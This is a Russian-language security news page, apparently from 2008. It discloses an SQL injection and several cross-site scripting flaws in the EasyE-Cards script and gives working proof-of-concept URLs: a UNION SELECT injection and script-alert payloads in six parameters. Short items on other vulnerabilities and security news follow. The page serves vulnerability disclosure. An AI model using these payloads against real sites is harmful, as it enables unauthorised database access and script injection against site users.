SQL-инъекция и межсайтовый скриптинг в EasyE-Cards

1) Уязвимость существует из-за недостаточной обработки входных данных в параметре "sid" сценарием staticpages/easyecards/index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://Example/index.php?show=pickup&sid= 99999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13/*

2) Уязвимость существует из-за недостаточной обработки входных данных в параметрах "ResultHtml", "dir", "SenderName", "RecipientName", "SenderMail", и "RecipientMail" сценарием staticpages/easyecards/index.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

Xss 1 : http://Example/?ResultHtml=<script>alert(xss)</script>

Xss 2 : http://Example/index.php?step=2&dir=<>>>>"<script>alert(xss)</script>

Xss 3 : http://Example/index.php?step=2&SenderName=<>>>>"<script>alert(xss)</script>

Xss 4 : http://Example/index.php?step=2&RecipientName=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E

Xss 5 : http://Example/index.php?step=2&SenderMail=<>>>>"<script>alert(xss)</script>

Xss 6 : http://Example/index.php?step=2&RecipientMail=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E

www.xakep.ru

Безопасная связь 24-07-2008
SQL-инъекция в E-Shop Shopping 16-08-2008 Безопасная связь
Программа: E-Shop Shopping CartУязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "cid" сценарием search_results.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.Эксплоит:http://www.example.com/path/sea...

Россия не виновата в атаках на грузинские сайты 15-08-2008 Безопасная связь
Ранее на этой неделе было опубликовано заявление МИД Грузии о том, что пресловутая Russian Business Network (RBN) была активно вовлечена в совершение кибератак на Грузию, с позволения и под прикрытием российского правительства. С тех пор новых сообщений на эту тему не поступало, однако среди экспертов развернулось обсуждение того, действительно ли российское правительство причастно к этому.По мнению Гади Эврона, бывшего старшего офицера...

Суд признал обязательным соблюдение лицензий на свободное ПО 15-08-2008 Безопасная связь
Апелляционный суд США на этой неделе вынес важное решение в пользу разработчиков программных продуктов с открытым исходным кодом, признав обязательным соблюдение лицензий на свободное ПО. Дело, о котором идет речь, берет начало в 2006 году. Тогда разработчик Роберт Якобсен, создатель программы с открытым кодом DecoderPro для моделирования железных дорог, подал иск против Мэтью Катцера, владельца компании Kamind Associates. По утвержде...

Отказ в обслуживании и выполнение произвольного кода в VMware ESXi 14-08-2008 Безопасная связь
Программа: VMware ESXi 3.xУязвимость позволяет удаленному злоумышленнику выполнить произвольный код и осуществить DoS атаку на целевую систему. Уязвимость существует из-за множественных ошибок в проверке входных данных в пакете OpenSSL 0.9.x. Атакующий может передать специально сформированные данные, что приведет к отказу системы в обслуживании и позволит выполнить произвольный код на целевой системе....

В Августе Microsoft выпустит 12 патчей, 7 критических 08-08-2008 Безопасная связь
IT-специалисты и системные администраторы, будут, похоже, весьма сильно заняты в этом месяце, поскольку Microsoft объявил о своих планах выпустить 12 патчей в рамках своей ежемесячной программы обновления. Семь из них будут иметь статус критических, а остальные – важных. Патчи со статусом критических коснутся множества программ, включая различные версии ОС Windows и такие приложения, как Internet Explorer, Access, Windows Media Player...

Майкрософт будет сообщать партнерам более подробную информацию об уязвимостях 06-08-2008 Безопасная связь
Microsoft будет предоставлять компаниям, продающим решения по безопасности, краткий технический обзор обнаруженных уязвимостей в продуктах Microsoft перед выпуском своих ежемесячных «обновлений по вторникам».Новая Программа Активной Защиты Microsoft, которая представлена на конференции по безопасности Black Hat во вторник, направлена на то, чтобы дать производителям программного обеспечения шанс подготовить все необходимые обновления ...

Переполнение буфера в OpenTTD 05-08-2008 Безопасная связь
Программа: OpenTTD 0.xУязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в функции "TruncateString()" в src/gfx.cpp. Атакующий может передать специально сформированные данные, что приведет к выполнению произвольного кода.